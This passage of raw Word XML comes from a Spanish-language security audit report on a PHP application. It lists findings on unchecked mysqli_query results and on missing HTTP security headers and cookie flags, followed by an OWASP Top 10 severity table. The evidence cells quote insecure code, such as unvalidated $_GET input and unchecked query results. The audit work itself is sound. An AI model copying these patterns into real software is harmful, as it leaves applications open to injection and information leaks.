      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="67926FAF"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D14003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33588FD3"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$key=$_GET['id'</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>];  /</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/ usado sin conversión ni validación en index.php y mostrar_carrito.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77D38B33"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0A0FBF1A"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99022AF"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98F507D"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VUL-21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="672D8BCD"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19230D4F"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70C24066"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A05:2021 – Security Misconfiguration (manejo de errores)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="051B8AAE"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9593653"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4E85FBD9"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BAJA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="473CD7D9"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CA3D655"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462394C"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Todas las llamadas a mysqli_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>query(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>) de la aplicación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="7DBD97DC"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431855D"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7AD5F8FA"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Ninguna llamada a mysqli_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>query(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>) valida su resultado. En un entorno con display_errors habilitado (configuración por defecto de XAMPP/WAMP), un intento de inyección SQL malformado puede provocar que mysqli_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>query(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>) retorne false y que mysqli_fetch_array(false) genere un error de tipo visible en pantalla, exponiendo rutas absolutas del servidor y detalles del código fuente que facilitan el reconocimiento previo a un ataque.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="0005F87C"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6D77DBA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lastRenderedPageBreak/>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2A32F5A1"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$result=mysqli_query(conectar(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>),$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sql);</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t>$datos=mysqli_fetch_array($result);</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t>// sin verificar if($result===false) antes de usar $result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="001A5C1B" w14:textId="77777777" w:rsidR="00D21427" w:rsidRDefault="00D21427"/>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0"/>
        <w:gridCol w:w="7252"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="08012E61"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0E4C2DFD"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N° VUL</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B8CEA32" w14:textId="77777777" w:rsidR="00D21427" w:rsidRPr="00D21427" w:rsidRDefault="00D21427"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b/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>VUL-22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="4297F608"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tcPr>
          <w:p w14:paraId="305CFD5B" w14:textId="77777777" w:rsidR="00245096" w:rsidRPr="00D21427" w:rsidRDefault="00245096" w:rsidP="00D21427">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t>CATEGORIA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7252" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7A7055C9" w14:textId="77777777" w:rsidR="00245096" w:rsidRPr="00245096" w:rsidRDefault="00245096" w:rsidP="00245096">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>A05:2021 – Security Misconfiguration (cabeceras y cookies)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="6C089307"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5AC66E0A"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SEVERIDAD</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09786D5F" w14:textId="77777777" w:rsidR="00D21427" w:rsidRPr="00D21427" w:rsidRDefault="00D21427" w:rsidP="00D21427">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t>BAJA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="1BD68BB7"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FFD5241"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ÍTEM AFECTADO</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544951DE"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Segoe UI" w:hAnsi="Segoe UI"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Aplicación completa (respuestas HTTP y configuración de sesión)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="5C438DA6"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10BAABB2"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DETALLE</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645998B0" w14:textId="77777777" w:rsidR="00D21427" w:rsidRPr="00D21427" w:rsidRDefault="009F3A24" w:rsidP="00D21427">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>No se evidencian cabeceras de seguridad HTTP (Content-Security-Policy, X-Content-Type-Options, X-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>Frame</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>-Options, Strict-Transport-Security) ni configuración de la cookie de sesión con los atributos HttpOnly, Secure y SameSite.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="3A4B77EB" w14:textId="77777777" w:rsidTr="001F6BF4">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1570" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F497D"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="269E00DC" w14:textId="77777777" w:rsidR="00D21427" w:rsidRPr="00D21427" w:rsidRDefault="00D21427" w:rsidP="00D21427">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="F5F5F5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D21427">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t>EVIDENCIA</w:t>
            </w:r>
            <w:r w:rsidRPr="00D21427">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="FFFFFF"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7252" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1693AC73" w14:textId="77777777" w:rsidR="00D21427" w:rsidRPr="00D21427" w:rsidRDefault="00D21427" w:rsidP="009F3A24">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ausencia de llamadas a </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>header(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">) con directivas de seguridad, y de las directivas </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>session.cookie</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">_httponly / </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>session.cookie</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">_samesite / </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>session.cookie</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>_secure en la configuración de PHP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C44386D" w14:textId="77777777" w:rsidR="00D21427" w:rsidRDefault="00D21427"/>
    <w:p w14:paraId="13029A73" w14:textId="77777777" w:rsidR="009F3A24" w:rsidRPr="00AE37FA" w:rsidRDefault="009F3A24" w:rsidP="009F3A24">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE37FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Criterios de Clasificación </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EBFBC7" w14:textId="77777777" w:rsidR="009F3A24" w:rsidRPr="009F3A24" w:rsidRDefault="009F3A24" w:rsidP="009F3A24">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2926DE81" w14:textId="069DE07F"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A continuación, se detallan los criterios de clasificación de vulnerabilidades según su nivel de criticidad que </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="009F3A24">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:color w:val="1F497D"/>
            <w:lang w:eastAsia="es-CL"/>
          </w:rPr>
          <w:t>OWASP Top 10:2021</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009F3A24">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidR="008211E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> que indica:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5332D334"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8"/>
        <w:gridCol w:w="7204"/>
      </w:tblGrid>
      <w:tr w:rsidR="009F3A24" w:rsidRPr="009F3A24" w14:paraId="2ABDBF10" w14:textId="77777777" w:rsidTr="009F3A24">
        <w:trPr>
          <w:trHeight w:val="285"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FDD51A6"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D21427">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:lang w:val="es-ES" w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t>CRÍTICA</w:t>
            </w:r>
            <w:r w:rsidRPr="00D21427">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="C00000"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="009F3A24">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7650" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48922C63"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Inyección, autenticación y gestión de sesiones, exposición de datos sensibles. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F3A24" w:rsidRPr="009F3A24" w14:paraId="6C810ABB" w14:textId="77777777" w:rsidTr="009F3A24">
        <w:trPr>
          <w:trHeight w:val="285"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C578E45"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D21427">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t>ALTA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7650" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55F9D584"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XXE, control de acceso incorrecto, desprotección de componentes. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F3A24" w:rsidRPr="009F3A24" w14:paraId="6DCB170E" w14:textId="77777777" w:rsidTr="009F3A24">
        <w:trPr>
          <w:trHeight w:val="285"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D85A9B6"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D21427">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="FFC000"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t>MEDIA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7650" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BCC75AB"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XSS, deserialización insegura, uso de componentes con vulnerabilidades conocidas. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F3A24" w:rsidRPr="009F3A24" w14:paraId="214F8219" w14:textId="77777777" w:rsidTr="009F3A24">
        <w:trPr>
          <w:trHeight w:val="285"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="234070B2"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D21427">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:color w:val="00B050"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t>BAJA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7650" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A3012D6"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Insuficiente monitorización y registro de auditoría. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="023EB15B" w14:textId="77777777" w:rsidR="009F3A24" w:rsidRPr="009F3A24" w:rsidRDefault="009F3A24" w:rsidP="009F3A24">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>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Tabla 19: Niveles de Criticidad definidos OWASP TOP 10, 2021.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A26B358" w14:textId="77777777" w:rsidR="009F3A24" w:rsidRPr="009F3A24" w:rsidRDefault="009F3A24" w:rsidP="009F3A24">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F3A24">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BB1527" w14:textId="77777777" w:rsidR="009F3A24" w:rsidRPr="009F3A24" w:rsidRDefault="009F3A24" w:rsidP="009F3A24">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="172CEFCA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Cabe mencionar que la categorización de las vulnerabilidades en OWASP Top 10 se basa en la probabilidad de que una vulnerabilidad sea explotada, el impacto potencial en la seguridad del sistema y la facilidad de explotación.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FCB712" w14:textId="16FAD303" w:rsidR="172CEFCA" w:rsidRDefault="172CEFCA" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AA80420" w14:textId="09C4A0BE" w:rsidR="172CEFCA" w:rsidRDefault="172CEFCA" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
